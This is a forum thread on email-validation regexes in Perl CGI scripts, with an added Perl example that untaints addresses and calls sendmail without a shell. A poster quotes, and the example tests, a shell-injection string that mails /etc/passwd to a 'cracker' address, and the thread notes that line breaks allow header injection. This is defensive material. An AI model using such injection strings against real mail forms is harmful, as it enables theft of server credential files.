Just wondering... what is the best and most accurate email matching regular expression that you guys use? Each different script and book I read uses a different one, so I just wanted to ask some of you guys what you use.

Just put the Email::Valid Module in your cgi-bin directory if your ISP doesn't want to install it. You can use any 'pure Perl'-Modules by putting them in your scripts directory. You can get the module from CPAN.

E-mail can't be matched. Well, you can use jasmine's regexp. The problem is that there doesn't even need to be a @ in it. You can have an e-mail like "Fred-&-Barney"@gfd.com

However, for external e-mail addresses a @ is used to separate the mailbox and domain name. You can simply validate something like

Code

if( $email =~ m[^(.+)\@(.+)\.(.+)$] )

I never validate more than this.

To be really sure, you need to send an e-mail to that address, containing instructions on how to proceed further. As long as the user hasn't done that, your script should mark the e-mail address as invalid, or something else.

I'm validating for security reasons. The e-mail address will be passed through the shell to sendmail. I need to untaint it with a regex so a user can't enter ; mail cracker@badguys.net </etc/passwd and retrieve the password file.

Yeah, a "word character" \w is [a-zA-Z0-9_]. That never was the exact character class I wanted.

What I'm doing is receiving form input from a text box, saving it to a database, and subsequently using it in the TO: field for SendMail. I can't send whatever the user enters through the shell until I've verified that it's just an e-mail address. I don't care if it is a bad address. I handle that problem within the script. I just need to make sure I'm not sending some cracker's attempt to break into the server.

>> If you can't control it, improve it, correlate it or disseminate it with PERL, it doesn't exist!

Here are some notes / tips:
- Make sure you're sending the email only IF the request_type is POST. Otherwise someone can bookmark the page.
- You can test something with domains maybe (if the mailfrom is called from a valid domain).
- Make sure there are no line breaks in the e-mail / subject fields. You can place more SMTP header tags after it. I always test that in my mailform script.

Oh, I forgot: never code the e-mail address you're sending to in the HTML code. Use an alias instead. You convert that alias into the real e-mail address using a hash.
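
The concern raised in the thread (an address handed to sendmail through the shell, plus the tip about line breaks in header fields), as an added Perl example that is not code from any poster. The names `untaint_email` and `send_mail` are hypothetical, the `/usr/sbin/sendmail` path is an assumption, and the allow-list is deliberately narrower than what the mail standards permit, so a quoted mailbox like the "Fred-&-Barney" one above is rejected.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Hypothetical helper: return the captured address, or undef if the input is
# not a plain mailbox@domain built only from allow-listed characters.
sub untaint_email {
    my ($input) = @_;
    return undef unless defined $input && length($input) <= 254;
    # \A...\z instead of ^...$ so a trailing newline cannot slip through.
    # Whitespace, quotes and shell metacharacters are not in the allow list.
    if ($input =~ /\A([A-Za-z0-9._+-]+\@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+)\z/) {
        my $addr = $1;                    # a capture is untainted under -T
        return undef if $addr =~ /\A-/;   # never option-like if used as an argument
        return $addr;
    }
    return undef;
}

# Hypothetical sender: the list form of a pipe open runs sendmail directly,
# so no shell ever interprets ';' or '<'. The sendmail path is an assumption.
sub send_mail {
    my ($to, $subject, $body) = @_;
    my $addr = untaint_email($to) or die "rejected recipient\n";
    die "line break in subject\n" if $subject =~ /[\r\n]/;
    open(my $mail, '|-', '/usr/sbin/sendmail', '-t', '-oi')
        or die "cannot run sendmail: $!\n";
    print {$mail} "To: $addr\nSubject: $subject\n\n$body\n";
    close($mail) or die "sendmail failed\n";
}

# Constructed sample inputs, including the string quoted in the thread.
my @samples = (
    'fred@example.com',
    '; mail cracker@badguys.net </etc/passwd',
    "fred\@example.com\nBcc: someone\@example.net",
    '-x@example.com',
    '"Fred-&-Barney"@gfd.com',
);
for my $s (@samples) {
    (my $shown = $s) =~ s/\n/\\n/g;       # make embedded newlines visible
    printf "%-45s %s\n", $shown,
        defined(untaint_email($s)) ? 'accepted' : 'rejected';
}
```

Only the first sample is accepted. `send_mail` is defined but not called, so the script runs without a mail system installed.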